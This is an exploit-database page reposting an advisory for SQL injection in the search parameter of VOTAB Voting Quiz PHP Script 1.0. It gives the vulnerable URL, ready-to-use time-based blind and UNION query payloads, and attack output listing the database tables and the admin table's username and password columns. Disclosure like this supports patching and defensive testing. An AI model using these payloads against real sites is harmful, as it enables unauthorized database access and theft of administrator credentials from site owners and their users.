Advertisement






VOTAB Voting Quiz PHP Script 1.0 SQL Injection

CVE Category Price Severity
N/A CWE-89 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2023-05-10
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023050029

Below is a copy:

VOTAB Voting Quiz PHP Script 1.0 SQL Injection
                                     C r a C k E r                                    
                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  


               From The Ashes and Dust Rises An Unimaginable crack....          

                                  [ Vulnerability ]                                   

:  Author   : CraCkEr                                                                    :
  Website  : codesler.com                                                               
  Vendor   : Codesler - Rohit Chouhan (codester.com)                                    
  Software : VOTAB - Voting Quiz PHP Script 1.0                                         
  Vuln Type: SQL Injection                                                              
  Impact   : Database Access                                                            
                                                                                        

                                                                                       

:                                                                                        :
 Release Notes:                                                                         
                                                                           
                                                                                        
 SQL injection attacks can allow unauthorized access to sensitive data, modification of 
 data and crash the application or make it unavailable, leading to lost revenue and     
 damage to a company's reputation.                                                      
                                                                                        

                                                                                      


Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
       
CryptoJob (Twitter) twitter.com/0x0CryptoJob
   

                                     CraCkEr 2023                                    


Path: /search.php

https://website/search.php?q=[SQLI]

GET parameter 'q' is vulnerable to SQL Injection

---
Parameter: q (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=' AND (SELECT 5257 FROM (SELECT(SLEEP(5)))xauk) AND 'xYsK'='xYsK

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: q=' UNION ALL SELECT CONCAT(0x71707a7171,0x53474f4b726f5a754b696a76766959614569735371744d4d6d7a646a7069654b6666795967414a47,0x7176786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---


[+] Starting the Attack

fetching current database
current database: '**401**_votab'


fetching tables

+---------------+
| activity      |
| admin         |
| settings      |
| smtp_settings |
| users         |
| vote          |
| votes         |
+---------------+


fetching columns for table 'admin'

[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| name     | text        |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+


[-] Done

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.